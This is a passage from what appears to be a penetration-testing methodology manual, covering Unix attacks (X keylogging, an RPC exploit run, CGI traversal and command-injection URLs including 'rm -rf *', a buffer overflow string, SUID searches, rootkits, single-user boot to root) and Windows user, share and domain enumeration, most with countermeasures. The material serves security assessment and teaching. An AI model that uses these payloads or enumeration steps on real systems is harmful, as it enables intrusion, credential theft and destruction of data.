capture windows for display elsewhere, and even remap the keyboard to issue nefarious
commands no matter what the user types. Most problems stem from a weak access
control paradigm or pure indolence on the part of the system administrator. The simplest
and most popular form of X access control is x-host authentication. This mechanism
provides access control by IP address and is the weakest form of X authentication.
Examples / Results
[localhost]$ xscan target_machine
Scanning hostname quake ...
Connecting to quake (target_machine) on port 6000...
Connected.
Host quake is running X.
Starting keyboard logging of host quake:0.0 to file KEYLOGquake:0.0...
Now any keystrokes typed at the console will be captured to the KEYLOG.quake file.
[localhost]$ tail -f KEYLOG.quake:0.0
Page 374 of 1123
su [Shift_L]Iamowned[Shift_R]!
A quick tail of the log file reveals what the user is typing in real time. In our example, the
user issued the su command followed by the root password of “Iamowned!” Xscan will
even note if the SHIFT keys are pressed. It is also easy for attackers to view specific
window.
Page 375 of 1123
E.6.12
RPC Attacks
Description
Remote Procedure Calls (RPCs) allow an administrator to execute commands on
networked computers to make large scale administration more effecient. Because they
are used to run administrative commands, the RPC services typically run with the
highest privileges on the system. Due to a long history of easily exploited vulnerabilities,
RPC services are a continued threat to any organization
Examples / Results
[localhost]# cmsd.sh quake 192.168.1.xxx 2 192.168.1.xxx
Executing exploit...
rtable_create worked
clnt_call[rtable_insert]: RPC: Unable to receive; errno = Connection reset by peer
Countermeasure
The best defense against remote RPC attacks is to disable any RPC service that is not
absolutely necessary. If an RPC service is critical to the operation of the server, consider
implementing an access control device that only allows authorized systems to contact
those RPC ports, which may be very difficult—depending on your environment. Consider
enabling a nonexecutable stack if it is supported by your operating system. Also,
consider using Secure RPC if it is supported by your version of UNIX. Secure RPC
attempts to provide an additional level of authentication based upon public-key
cryptography. Secure RPC is not a panacea, because many UNIX vendors have not
adopted this protocol. Thus, interoperability is a big issue. Finally, ensure that all the
latest vendor patches have been applied.
Page 376 of 1123
E.6.13
Web Attacks
Description
Port 80 is the standard port for websites, and it can have a lot of different security
issues.These holes can allow an attacker to gain either administrative access to the
website, or even the web server itself.
Examples / Results
•
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
•
http://host/cgi-bin/lame.cgi?page=ls%20-al|
•
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls|
•
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*|
•
http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*;
•
http://host/cgibin/bad.cgi?doh=../../../../bin/chown%20zeno%20/etc/master.passwd|
•
http://host/cgibin/helloworld?type=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Countermeasure
•
Analyze log server log periodically.
•
Follow web application development best practices
•
Refer ISSAF – Web Application security section of ISSAF.
Page 377 of 1123
E.6.14
Mail Services Attacks
[coming soon]
E.6.15
Local Attacks
Description
Local attacks are performed when someone has non-privileges and/or physical access
to the systems. In most cases the attacker knows the security mechanism in place and
can potentially use social engineering more effectively.
E.6.16
File and Directory Permission Attacks
Description
Find and analyze world executable shell and binaries
Find and analyze world writeable
Find and analyze world executable + writable
Find and analyze SGUID root files
Find and analyze SUID root files
Find and analyze sticky bit files
Gain privileges and escalate them
•
Disassemble
•
Overflow attacks
Perform denial of service by crashing them
Find world executable shell and binaries
# find / -perm -1 -type f –print
Find world writable files
# find / -perm -2 -type f -print
Find world executable + writable
# find / -perm -3 -type f -print
Page 378 of 1123
Safeguard
•
No file in the system should have world executable permissions.
•
Directories should have world executables as required. It is not practical for the
system to function in full capacity if world executable is removed. So it is
recommended that appropriate precaution should be taken while revoking
permissions.
•
Always maintain checksum of all critical files:
o
/usr/bin/*.*
o
/usr/sbin/*.*
o
/sbin/*.*
o
/bin/*.*
o
/etc/*.*
o
/lib/*.*
o
o
Other critical files
o
Daily incremental and periodic full backup data files
•
Set default umask = 022. It will set default value rwx for owner to all new files.
•
Set default umask = 027. It will set default value rw-r----- for ower to all new files and
only owner and group has access.
Page 379 of 1123
E.6.17
Symlink Attacks
Description
3. SUID /SGID files kill
3.1.
Find SGUID root files
find / -perm -4000 -exec ls -al {} \;
3.2.
Find SUID root files
find / -perm -2000 -exec ls -al {} \;
3.3.
Find sticky bit files
find / -perm -1000 -exec ls -al {} \;
Find SGUID root files
[balwant@localhost balwant]$ find / -perm -4000 -exec ls -al {} \;
-rwsr-xr-x 1 root
bin
1303552 May 6 10:39 /usr/openwin/bin/Xsun
-rwsr-xr-x 1 root
bin
74716 Aug 5 2003 /usr/openwin/bin/xlock
-r-sr-xr-x 1 root
-rwsr-sr-x
bin
1 root
38056 Sep 21 2002 /usr/openwin/bin/sys-suspend
bin
22868 May
28 02:49
bin
94632 May
28 02:53
/usr/openwin/bin/kcms_configure
-rwsr-sr-x
1 root
/usr/openwin/bin/kcms_calibrate
-rwsr-xr-x 1 root
bin
295400 Mar 19 2004 /usr/openwin/bin/xscreensaver
-rwsr-xr-x 1 root
bin
23180 Oct 17 2002 /usr/openwin/lib/mkcookie
-r-sr-xr-x 1 root
sys
13748 Jun 17 02:13 /usr/bin/i86/newtask
-r-sr-xr-x 2 root
bin
11272 Nov 4 2002 /usr/bin/i86/uptime
-r-sr-xr-x 2 root
bin
11272 Nov 4 2002 /usr/bin/i86/w
-rwsr-xr-x 1 root
sys
35684 Dec 14 2002 /usr/bin/at
-rwsr-xr-x 1 root
sys
13916 Nov 4 2002 /usr/bin/atq
-rwsr-xr-x 1 root
sys
12528 Nov 4 2002 /usr/bin/atrm
-r-sr-xr-x 1 root
bin
17776 Feb 25 2004 /usr/bin/crontab
-r-sr-xr-x 1 root
bin
14012 Nov 4 2002 /usr/bin/eject
-r-sr-xr-x 1 root
bin
25704 Nov 4 2002 /usr/bin/fdformat
-r-sr-xr-x 1 root
bin
28344 Nov 4 2002 /usr/bin/login
Page 380 of 1123
-rwsr-xr-x 1 root
sys
7420 Nov 4 2002 /usr/bin/newgrp
-r-sr-sr-x 1 root
sys
22168 Nov 4 2002 /usr/bin/passwd
-r-sr-xr-x 1 root
bin
9732 Oct 30 2003 /usr/bin/pfexec
-r-sr-xr-x 1 root
sys
21808 May 11 11:43 /usr/bin/su
bin
51452 Nov 4 2002 /usr/bin/tip
-r-s--x--x 1 uucp
-r-s--x--x 1 root
sys
2992340 Jul 31 2003 /usr/bin/admintool
-r-s--x--x 1 root
lp
9728 May 12 03:58 /usr/bin/cancel
-r-s--x--x 1 root
lp
23204 May 12 03:58 /usr/bin/lp
-r-s--x--x 1 root
lp
9772 May 12 03:58 /usr/bin/lpset
-r-s--x--x 1 root
lp
22432 May 12 03:58 /usr/bin/lpstat
-r-sr-xr-x 1 root
bin
20620 Feb 26 2003 /usr/bin/rcp
-r-sr-xr-x 1 root
bin
52024 Nov 4 2002 /usr/bin/rdist
-r-sr-xr-x 1 root
bin
14968 Nov 4 2002 /usr/bin/rlogin
-r-sr-xr-x 1 root
bin
9004 Nov 4 2002 /usr/bin/rsh
-r-sr-xr-x 1 root
sys
39628 Nov 4 2002 /usr/bin/chkey
-r-sr-xr-x 1 root
bin
4644 Nov 4 2002 /usr/bin/mailq
-r-sr-xr-x 1 root
bin
39444 Nov 12 2003 /usr/bin/rmformat
-r-sr-xr-x 1 root
bin
6044 Nov 4 2002 /usr/bin/volcheck
-r-sr-xr-x 1 root
bin
12584 Nov 4 2002 /usr/bin/volrmmount
-r-sr-xr-x 1 root
bin
215296 Apr 2 2004 /usr/bin/pppd
---s--x--x 1 root
uucp
66892 Nov 4 2002 /usr/bin/ct
---s--x--x 1 uucp
uucp
78840 Nov 4 2002 /usr/bin/cu
---s--x--x 1 uucp
uucp
67812 Aug 14 2003 /usr/bin/uucp
---s--x--x 1 uucp
uucp
24208 Nov 4 2002 /usr/bin/uuglist
---s--x--x 1 uucp
uucp
20332 Nov 4 2002 /usr/bin/uuname
---s--x--x 1 uucp
uucp
60676 Nov 4 2002 /usr/bin/uustat
---s--x--x 1 uucp
uucp
71516 Nov 4 2002 /usr/bin/uux
-rwsr-xr-x 1 root
bin
56264 Apr 12 15:47 /usr/bin/cdrw
-r-sr-xr-x 1 root
bin
14172 Aug 13 2003 /usr/lib/fs/ufs/quota
-r-sr-xr-x 1 root
bin
83820 Apr 12 15:30 /usr/lib/fs/ufs/ufsdump
-r-sr-xr-x 1 root
bin
968804 Apr 12 15:30 /usr/lib/fs/ufs/ufsrestore
---s--x--x 1 root
bin
4820 Nov 4 2002 /usr/lib/pt_chmod
-r-sr-xr-x 1 root
bin
7604 Apr 22 2003 /usr/lib/utmp_update
-r-s--x--x 1 root
bin
19864 May 12 03:58 /usr/lib/lp/bin/netpr
-r-s--x--x 1 root
bin
26160 Apr 27 00:48 /usr/lib/print/lpd-port
Page 381 of 1123
-rwsr-xr-x 1 root
adm
5400 Nov 4 2002 /usr/lib/acct/accton
---s--x--x 1 uucp
uucp
6492 Nov 4 2002 /usr/lib/uucp/remote.unknown
---s--x--x 1 uucp
uucp
159528 Nov 4 2002 /usr/lib/uucp/uucico
---s--x--x 1 uucp
uucp
33408 Nov 4 2002 /usr/lib/uucp/uusched
---s--x--x 1 uucp
uucp
83884 Nov 4 2002 /usr/lib/uucp/uuxqt
-r-sr-xr-x 1 root
bin
11992 Nov 4 2002 /usr/sbin/i86/whodo
-rwsr-xr-x 3 root
bin
16160 Apr 2 2003 /usr/sbin/allocate
-rwsr-xr-x 1 root
sys
23480 Nov 4 2002 /usr/sbin/sacadm
-r-sr-xr-x 1 root
bin
33148 Apr 13 02:00 /usr/sbin/traceroute
-rwsr-xr-x 3 root
bin
16160 Apr 2 2003 /usr/sbin/deallocate
-rwsr-xr-x 3 root
bin
16160 Apr 2 2003 /usr/sbin/list_devices
-r-sr-xr-x 1 root
bin
43788 Apr 13 06:26 /usr/sbin/ping
-r-sr-xr-x 1 root
bin
26052 Mar 24 2004 /usr/sbin/pmconfig
-r-s--x--x 1 root
lp
7416 May 12 03:58 /usr/sbin/lpmove
-r-sr-xr-x 1 root
bin
726088 Nov 4 2002 /usr/sbin/static/rcp
-r-sr-sr-x 1 root
sys
23092 Sep 21 2002 /usr/dt/bin/dtaction
-r-sr-xr-x 1 root
bin
32872 Sep 21 2002 /usr/dt/bin/dtappgather
-r-sr-sr-x 1 root
daemon
-r-sr-xr-x 1 root
bin
349604 Jan 11 2003 /usr/dt/bin/dtprintinfo
-r-sr-xr-x 1 root
bin
154544 Apr 15 18:30 /usr/dt/bin/dtsession
288084 Sep 21 2002 /usr/dt/bin/sdtcm_convert
[balwant@localhost balwant]$ find / -perm -2000 -exec ls -al {} \;
-r-xr-sr-x 1 root
sys
13540 Nov 4 2002 /usr/platform/i86pc/sbin/eeprom
-rwxr-sr-x 1 root
root
1474468 Mar 16 2004 /usr/openwin/bin/Xprt
-rwxr-sr-x 1 root
root
312936 Oct 17 2002 /usr/openwin/bin/lbxproxy
-rwsr-sr-x 1 root
bin
22868 May 28 02:49 /usr/openwin/bin/kcms_configure
-rwsr-sr-x 1 root
bin
94632 May 28 02:53 /usr/openwin/bin/kcms_calibrate
-r-x--s--x 1 root
mail
66256 Dec 14 2002 /usr/bin/mail
-r-x--s--x 1 root
mail
118064 Nov 4 2002 /usr/bin/mailx
-r-xr-sr-x 1 root
sys
59700 Nov 4 2002 /usr/bin/netstat
-r-sr-sr-x 1 root
sys
22168 Nov 4 2002 /usr/bin/passwd
-r-xr-sr-x 1 root
tty
-r-xr-sr-x 1 root
smmsp
11612 Nov 4 2002 /usr/bin/write
872332 Sep 25 2003 /usr/lib/sendmail
Page 382 of 1123
-r-xr-sr-x 1 root
sys
22064 Nov 4 2002 /usr/sbin/i86/prtconf
-r-xr-sr-x 1 root
sys
10528 Nov 4 2002 /usr/sbin/i86/swap
-r-xr-sr-x 1 root
sys
22056 Nov 4 2002 /usr/sbin/i86/sysdef
-r-xr-sr-x 1 root
tty
-r-sr-sr-x 1 root
sys
-r-sr-sr-x 1 root
daemon
-r-xr-sr-x 1 root
mail
1458996 May 4 19:17 /usr/dt/bin/dtmail
-r-xr-sr-x 1 root
mail
445972 Jan 11 2003 /usr/dt/bin/dtmailpr
E.6.18
10036 Mar 26 2003 /usr/sbin/wall
23092 Sep 21 2002 /usr/dt/bin/dtaction
288084 Sep 21 2002 /usr/dt/bin/sdtcm_convert
System Call Attacks
The main difference between a normal rootkit and an LKM Rootkit is very simple: normal
rootkits replace system utilities that enable the attacker to hide files, processes and
network connections. An LKM Rootkit, on the other hand, does something a bit more
interesting: it replaces the location of system calls, changing the original memory
addresses to something else, and in that different location there is a trojanized version of
the system call. So, they do not need to modify utilities (or libraries), they simply replace
what these utilities and libraries use! Rootkits of this sort go by the names of Rkit and
Adore LKM, just to mention a couple of the most common ones.
Here is a list of the typically modified system calls: sys_clone, sys_close, sys_execve,
sys_fork, sys_ioctl, sys_kill, sys_mkdir, sys_read, sys_readdir, sys_write.
The only way an LKM rootkit can be detected is by analyzing kernel memory directly.
One of way to do this is to compare system call addresses (you will recall that LKM
rootkits change them). This task can be easily performed by using tools such as kstat,
which read kernel memory through /dev/kmem. kstat provides information on running
processes via its '-P' switch, which includes hidden processes. Compare its output with
what "ps aef" tells you. Additionaly, you can query a specific process id with the '-p '
parameter. To analyze system call addresses you should specify the '-s' switch. After an
initial system installation and full configuration, record "kstat -s" output. Memory
addresses there will provide correct values you can compare from time to time. Lines
with a WARNING show the possibility that your system has been compromised. kstat
can also act as a replacement for lsmod with the '-M' switch. You will be able to read the
trojan kernel module on the list.
Page 383 of 1123
For more information regarding rootkits, check out the following sites and documentes:
www.chkrootkit.org/ Documentation Section
Detecting and Understanding Rootkits, by Arturo 'Buanzo' Busleiman, President,
OISSG.Ar http://www.buanzo.com.ar/sec/Rootkits.html
E.6.19
Race Conditions
A race condition is an undesirable situation that occurs when a device or system
attempts to perform two or more operations at the same time, but because of the nature
of the device or system, the operations must be done in the proper sequence in order to
be done correctly.
Race conditions could arise in threads, files any form of resource which is accessed by
multiple operations
For example:
A multi-threaded race condition in the processing of incoming RPC requests. Due to a
flaw in the software, two separate threads may attempt to process the same incoming
RPC request. One of the threads may free the memory allocated to hold the incoming
packet before the other thread is finished processing the packet. As a result, a memory
error may occur.
E.6.20
Key Logger Attacks
There are keyloggers for GNU+Linux that are LKM based. (See "System Call Attacks").
In this case, the sys_read() system call is intercepted. If the file descriptor is the standard
input (0 or stdin), and just one byte is read, then we have a keystroke. It is not usually a
good approach to install LKM tools (Rootkits, key loggers, process hiders) as many
times they modify the system behaviour in such a way that even a luser can see it. As a
simple countermeasure, system administrators or deployers can build custom kernel
without the ability to load kernel modules.
Page 384 of 1123
E.6.21
Physical Security Assessment
1. Use boot loader to start into single user mode, gain the root access and change the
password, or if it is a linux system, use the "init=/bin/sh" kernel parameter if you can
edit the boot loader command line.
2. Mount using secondary storage media, boot it into another Operating system and
gain privileged access. Take into account the target's filesystem type if you need
write access.
Global Countermeasure[s]
1. Implement physical security. For detail refer physical security section.
2. Implement BIOS Passwords
3. Boot loader password e.g. Grub, Lilo
4. Boot sequences should not contain CD Drive and floppy drive to retain the
functionality and keep secure (complement with BIOS passwords).
Further Reading[s]
Google search for: "I lost my root password" or similar. Data Recovery related searches
will probe useful, too.
Page 385 of 1123
Page 386 of 1123
F WINDOWS SYSTEM SECURITY ASSESSMENT
F.1 DESCRIPTION
To understand the security implementation of the NT family, we will have to understand
following few terms.
Executive
The executive is the only part of the system that executes in kernel mode, and is divided
into three levels. The lowest level is called HAL, which provides an abstract view of the
underlying machine architecture. The motive for having this layer is to make the system
(more) portable.
Protected Subsystems
A protected subsystem provides an Application Programming Interface (API) which
Programs can call. Such protected subsystems are sometimes called servers, or
protected servers, and are executed in user mode as processes with certain privileges.
When an application calls an API routine, a message is routed to the server
implementing the API routine via the LPC facility. Later, the server replies by sending a
message back to the caller. Trusted Computer Base (TCB) servers are protected
servers, which execute as a process with a SYSTEM security context, which implies that
the process possesses an access token.
Token for processes running within the SYSTEM security context
Field
SYSTEM Token Value
User ID
SYSTEM
Group ID
array Everyone
Administrators
Owner ID
Points to Administrator
group ID
Privilege(s)
TCB (enabled)
CreateToken (disabled)
Page 387 of 1123
TakeOwnership (disabled)
CreatePageFile (enabled)
LockMemory (enabled)
AssignPrimaryToken (disabled)
IncreaseQuota (disabled)
IncreaseBasePriority (enabled)
CreatePermanent (enabled)
Debug (enabled)
Audit (enabled)
Security (disabled)
SystemEnvrionment (disabled)
ChangeNotify (enabled)
Backup (disabled)
Restore (disabled)
Shutdown (disabled)
LoadDriver (disabled)
ProfileSingleProcess (enabled)
Systemtime (disabled)
Default DACL SYSTEM GENERIC ALL Everyone GENERIC EXECUTE
Source
Type
Not used for SYSTEM token
Primary
We will describe some of the standard servers including: Session Manager, WinLogon,
Win32, LSA, and SAM.
Session Manager: is the first server to start in an NT system. It is responsible for loading
DOS device drivers, subsystems registered in the Registry, and initialization of Dynamic
Linked Libraries (DLLs), after which, it starts the WinLogon server.
WinLogon: is the logon process. It is responsible for coordinating and providing
interfaces for interactive logon/logoff. Moreover, it manages the Desktops. WinLogon
registers itself with Win32, during system initialization as the logon process.
Win32: makes Microsoft’s 32-bit Windows API available to application programs. In
addition, it provides the graphical user interface and controls all user input and output.
Only two objects are exported from this server, Window Station, i.e. user input/output
system (mouse, keyboard and screen), and a Desktop object.
LSA (Local Security Authority): has its main responsibilities centered on security. It plays
a major part in the logon process, and the security event logging process as well as
upholding the security policy of the local system. The security policy is implemented by
Page 388 of 1123
the local security policy database that keeps information on trusted domains, privileges
and access rights for users and user groups, security events. This database is managed
by LSA and accessed only through LSA.
SAM (Security Accounts Manager): is responsible for managing information about
accounts for users and user groups either locally or domain wide depending on its role. It
also provides support for the authentication package. The secure accounts are stored as
sub-object in a database in the registry. This database is accessed and managed only
by SAM.
F.2 PURPOSE
See Windows NT/200 system from attacker’s eye and using their tool.
F.3 REQUIREMENT
[Text]
F.3.1 Understand Organization’s environment
F.3.2 Technical Requirements
F.4 TERMINOLOGY
[Text]
F.5 HISTORY
[Text]
F.6 OBJECTIVE
•
Understanding Windows Security issues and safeguarding them
•
Following a structured approach for Windows system penetration/audit
•
Gaining Access and privilege escalation
•
Going beyond root and spreading the attack further
Page 389 of 1123
F.7 EXPECTED RESULT
•
List of live hosts
•
Processes running on hosts
•
List of users/shares
•
Version of kernel used in operating systems and their patch level
•
Vendor of operating system
•
List of vulnerabilities
•
List of compromised hosts
F.8 METHODOLOGY / PROCESS
Brief Intro and Table of Contents
F.8.1 Information Gathering
[Text]
F.8.2 Passive Information Gathering
Put information gathered from publicly available sources. There are a lot of public sites
which compile a lot of sensible information, let's see some of them:
F.8.2.1 WHOIS
Description
Whois is a program that will tell you the owner of any second-level domain name or IP
address
Pre-requisite[s]
A web browser or a command line whois client for windows
Steps to be performed
Guess target domain name and target IP address and IP range
Examples/Results
Page 390 of 1123
http://whois.sc/oissg.org
C:\>whois 212.13.208.91
% This is the RIPE Whois secondary server.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
inetnum:
netname:
212.13.208.0 - 212.13.211.255
JUMP-BYTEMARK
descr:
Bytemark Computer Consulting
country:
GB
admin-c:
MATB-RIPE
tech-c:
MATB-RIPE
status:
ASSIGNED PA
mnt-by:
mnt-lower:
source:
JUMP-MNT
JUMP-MNT
RIPE
changed:
james_r-ripe@jump.org.uk 20030902
changed:
james_r-ripe@jump.org.uk 20040220
route:
212.13.192.0/19
descr:
Jump Networks Ltd. /19 PA
origin:
AS8943
mnt-by:
JUMP-MNT
source:
RIPE
changed:
jon@knx.net.uk 20000925
changed:
james_r-ripe@jump.org.uk 20030131
person:
Matthew Bloch
address:
28, Montague Street
address:
York
address:
YO23 1JB
Page 391 of 1123
address:
ENGLAND
phone:
+44 8707 455026
e-mail:
matthew@bytemark.co.uk
nic-hdl:
MATB-RIPE
mnt-by:
JUMP-MNT
source:
RIPE
changed:
james_r-ripe@jump.org.uk 20030112
Analysis/Conclusion/Observation
Tool[s]
http://whois.sc/domain.com
http://www.samspade.org
http://www.geektools.com
http://www.ripe.net/whois
http://ws.arin.net/cgi-bin/whois.pl
http://allwhois.com/home.html
command-line Win32 & Linux whois
Countermeasures
Further Reading[s]
http://www.faqs.org/rfcs/rfc954.html
http://www.faqs.org/rfcs/rfc1714.html
Remarks
Page 392 of 1123
F.8.2.2 SEARCH ENGINES
Description
A search engine indexes a lot of internet pages and permit advanced search functions that
will help you in your search job
Pre-requisite[s]
Target domain name
All the information about the target you can obtain
Steps to be performed
Different advanced search attempts with all the keys you have
Analyze conscientiously the results and add more searches with these results
Examples/Results
http://www.google.es/search?q=allinurl:oissg.org&num=50&hl=es&lr=&ie=UTF-8&filter=0
http://www.google.es/search?num=50&hl=es&ie=UTF-8&q=balwant@oissg.org&meta=
http://www.google.es/search?q=allintext:balwant+%2B%40+oissg+%2B.+org&num=50&hl=
es&lr=&ie=UTF-8&as_qdr=all&filter=0
http://www.google.es/search?num=50&hl=es&lr=&ie=UTF8&as_qdr=all&q=%22212.13.208.91%22
Analysis/Conclusion/Observation
This tool is one of the most powerful tools to gather information, if you want to attack a
target you have to know all you can from it. This stage is very important to get the
maximum data possible and you can spend as much time for it as possible as information
gathered in this stage will be very useful in further attacks. Sometimes these attacks
provide new avenues for attackers to enter.
Tool[s]
http://www.google.com
http://www.yahoo.com
http://www.dogpile.com (very useful for cumulative search)
http://www.kartoo.com (useful in visualizing the links )
all the search engines and tools
Countermeasures
Refer ISSAF methodology section for countermeasures
Page 393 of 1123
Further Reading[s]
http://johnny.ihackstuff.com
http://www.buyukada.co.uk/projects/athena/
Remarks
Page 394 of 1123
F.8.3 Active Information Gathering
This method of gather information is based on actively ask a target machine so you can
learn more from that machine. Basically, there are two types of targets: domain
controllers (DCs), where we can obtain information about all the domain, and standalone servers or workstations, where we can obtain information only about that PC. It’s
important to observe that if you can get some information or a password in one standalone machine, it’s presumable that other machines in the same IP range have the same
password or information.
You can gather information actively following the next steps:
1. Enumeration Attack
•
Identify Users
•
Identify Shares
•
Identify Policies
•
Enumerate Registry
•
NETBIOS enumeration
•
o
Netbios Name enumeration
o
Netbios Session enumeration
MIB Enumeration
o
SNMPwalk
o
SNMPget
2. Identify Master Browsers
3. Identify Domains on the Network
4. Identify Domain Controllers
5. Identify Hosts of Domain
6. View Domain Membership
F.8.3.1 IDENTIFY USERS
Description
If the target machine is a DC the list of users will be the list of users of the entire domain,
Page 395 of 1123
but if the target is a stand-alone machine you only can obtain a list of target’s users
Pre-requisite[s]
Ports 135/TCP to 139/TCP or 445/TCP has to be reachable. Target machine has to had
Server service started and working
Steps to be performed
Run enum with the following flags.
C:>enum –UMNSPGL target_ip
Examples/Results
Using enum.exe (http://www.bindview.com/Resources/RAZOR/Files/enum.tar.gz):
“Example HERE”
Using ADSI, create the script userlist.vbs with the following contents:
sDomain
= "YourDomain"
Set oDomain = GetObject("WinNT://" & sDomain)
oDomain.Filter
= Array("User")
For Each oADobject In oDomain
WScript.Echo oADobject.Name & vbTab & oADobject.FullName & vbTab &
oADobject.Description & _
vbTab
&
oADobject.HomeDirDrive
&
vbTab
&
oADobject.HomeDirectory
Next
Analysis/Conclusion/Observation
An attacker was able to obtain the server accounts and can use password attack
techniques to guess the password of these accounts.
Countermeasures
Restrict anonymous access to your registry and public access to ports 135-139 & 445.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous=2
Page 396 of 1123
Tool[s]
http://www.bindview.com/Resources/RAZOR/Files/enum.tar.gz
Further Reading[s]
http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/
articles/Q246/2/61.ASP&NoWebContent=1
Remarks
Page 397 of 1123
F.8.3.2 IDENTIFY SHARES
Description
The shared directories can be hidden (adding a $ to the end of the share name) or visible
Pre-requisite[s]
Ports 135/TCP and 139/TCP or 445/TCP have to be reachable
Target machine has to had Server service started and working
Steps to be performed
Examples/Results
Using “NET VIEW” to view only visible shares:
C:\>net view \\workstation
Recursos compartidos en \\workstation
Nombre de recurso compartido
Tipo
Usado como Comentario
------------------------------------------------------------------------------Compartido
EPSONSty
Disco
Impresora
HP 4050
Impresora
Mi música
Disco
EPSON Stylus C70 Series
HP LaserJet 4050 Series PCL6
Se ha completado el comando correctamente.
Using “Enum.exe” to view visible and hidden shares:
C:\>enum -S workstation
server: workstation
setting up session... success.
enumerating shares (pass 1)... got 10 shares, 0 left:
Page 398 of 1123
IPC$ print$ EPSONSty Mi música
HP 4050 ADMIN$ C$
Compartido
cleaning up... success.
Analysis/Conclusion/Observation
An attacker was able to obtain the server visible and hidden shares.
Countermeasures
Restrict anonymous access to your registry and public access to ports 135-139 & 445.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous=2
Tool[s]
http://www.bindview.com/Resources/RAZOR/Files/enum.tar.gz
Further Reading[s]
http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/
articles/Q246/2/61.ASP&NoWebContent=1
Remarks
Page 399 of 1123
F.8.3.3 IDENTIFY POLICIES
Description
The windows security policies can also be obtained.
Pre-requisite[s]
Ports 135/TCP and 139/TCP or 445/TCP have to be reachable
Target machine has to had Server service started and working
Steps to be performed
Examples/Results
C:\>enum -P pc-oscar
server: pc-oscar
setting up session... success.
password policy:
min length: none
min age: none
max age: 42 days
lockout threshold: none
lockout duration: 30 mins
lockout reset: 30 mins
cleaning up... success.
Analysis/Conclusion/Observation
An attacker was able to obtain the server password policies.
Countermeasures
Restrict anonymous access to your registry and public access to ports 135-139 & 445.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous=2
Tool[s]
http://www.bindview.com/Resources/RAZOR/Files/enum.tar.gz
Further Reading[s]
http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/
Page 400 of 1123
articles/Q246/2/61.ASP&NoWebContent=1
Remarks
Page 401 of 1123
F.8.3.4 MIB ENUMERATION
Description
You can enumerate the system Mib using SNMP protocol, It gives you some information
like usernames, running services or open ports. The most used communities to access
Mibs is “public” and “private”. You can try to guess the community with brute force
programs or with a dictionary.
Pre-requisite[s]
Ports 161/UDP has to be reachable
Target machine has to had SNMP service started and working
Steps to be performed
Examples/Results
Using “SNMPUTIL” from Windows Support Tools:
Example HERE
Using Solarwinds MIB Browser or Network Browser:
Example HERE
Analysis/Conclusion/Observation
An attacker was able to gather some useful information from the server.
Countermeasures
Restrict access to port 161 UDP.
Enforce the SNMP password policy
Tool[s]
http://www.solarwinds.net/
SNMPUTIL from Windows 2000 Support Tools (Windows 2000 Server)
Getif-snmp
Page 402 of 1123
MIB browser by iReasoning
Further Reading[s]
http://support.microsoft.com/default.aspx?scid=kb;en-us;323340
http://www.faqs.org/rfcs/rfc1157.html
Remarks
Page 403 of 1123
F.8.3.5 IDENTIFY DOMAINS ON THE NETWORK
Description
It’s possible more than one domain can be reached on the same network because there
are trust relationships between two or more domains in the same domain controller.
Pre-requisite[s]
Ports 135/TCP and 139/TCP or 445/TCP have to be reachable
Target machine has to had Computer Browser service started and working
Steps to be performed
NetBIOS query to know the first domain
Use netdom.exe (from Support Tools) to list whatever you want
Examples/Results
Using netdom.exe:
netdom query /domain:domain trust
Analysis/Conclusion/Observation
An attacker was able to obtain the domain trust relationships and can use all the trusted
domain to obtain more sensible data.
Countermeasures
Restrict public access to ports 135-139 & 445.
Tool[s]
http://www.microsoft.com/downloads/details.aspx?FamilyID=49ae8576-9bb9-4126-9761ba8011fabf38&displaylang=en
Further Reading[s]
Remarks
Page 404 of 1123
F.8.3.6 IDENTIFY DOMAIN CONTROLLERS
Description
You can view all domain controllers managing a domain, maybe they are protected with
different effort.
Pre-requisite[s]
Ports 135/TCP and 139/TCP or 445/TCP have to be reachable
Steps to be performed
NetBIOS query to know the first domain
Use netdom.exe (from Support Tools) to list whatever you want
Examples/Results
Using netdom.exe:
netdom query /domain:domain dc
netdom query /domain:domain pdc
netdom query /domain:domain fsmo
Analysis/Conclusion/Observation
An attacker was able to obtain all the domain controllers can use it to obtain more sensible
data.
Countermeasures
Restrict public access to ports 135-139 & 445.
Tool[s]
http://www.microsoft.com/downloads/details.aspx?FamilyID=49ae8576-9bb9-4126-9761ba8011fabf38&displaylang=en
Further Reading[s]
Remarks
Page 405 of 1123
F.8.3.7 IDENTIFY HOSTS OF DOMAIN
Description
You can view a list of the workstations or servers of a domain.
Pre-requisite[s]
Ports 135/TCP and 139/TCP or 445/TCP have to be reachable
Steps to be performed
NetBIOS query to know the first domain
Use netdom.exe (from Support Tools) to list whatever you want
Examples/Results
Using netdom.exe:
netdom query /domain:domain workstation
netdom query /domain:domain server
netdom query /domain:domain ou
Analysis/Conclusion/Observation
An attacker was able to obtain all the domain controllers can use it to obtain more sensible
data.
Countermeasures
Restrict public access to ports 135-139 & 445.
Tool[s]
http://www.microsoft.com/downloads/details.aspx?FamilyID=49ae8576-9bb9-4126-9761ba8011fabf38&displaylang=en
Further Reading[s]
Remarks
Page 406 of 1123
Formatted: Bullets and Numbering
F.8.4 NETWORK MAPPING
